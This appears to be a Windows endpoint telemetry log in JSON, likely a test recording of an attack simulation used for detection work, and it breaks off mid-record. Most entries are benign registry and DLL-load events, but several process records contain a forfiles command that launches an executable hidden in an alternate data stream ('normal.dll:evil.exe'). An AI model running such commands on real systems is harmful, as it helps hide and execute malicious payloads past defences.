{ - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "image_load", - "image_name": "MrmCoreR.dll", - "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022780000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "BCP47mrm.dll", - "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022780000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "InputHost.dll", - "image_path": "C:\\Windows\\System32\\InputHost.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": 
"calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "process", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "terminate", - "timestamp": 131883574022950000, - "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "process", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "terminate", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program 
Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", - "registry_value": "Mode", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "process", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574023130000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p c:\\windows\\system32 /m notepad.exe /c \" c:\\folder\\normal.dll:evil.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6296, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574023260000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6296, 
- "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023250000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c c:\\folder\\normal.dll:evil.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 524, - "ppid": 6296, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "create", - "timestamp": 131883574023440000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}", - "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", - "user": 
"ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "forfiles.exe", - "image_path": "C:\\Windows\\System32\\forfiles.exe", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": 
"image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023580000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "process", - "pid": 524, - "process_name": "forfiles.exe", - 
"process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "terminate", - "timestamp": 131883574023760000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "process", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574024030000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", - "registry_value": "SplashScreen", - "timestamp": 131883574024210000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4248, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574024270000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024320000, - 
"unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024370000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024370000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024370000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883574024420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - 
"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574024420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024440000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574024490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", - "registry_value": "PreferredMinSize", - "timestamp": 131883574024490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574024640000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574024830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574024830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574024830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574024940000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574025100000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574025100000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
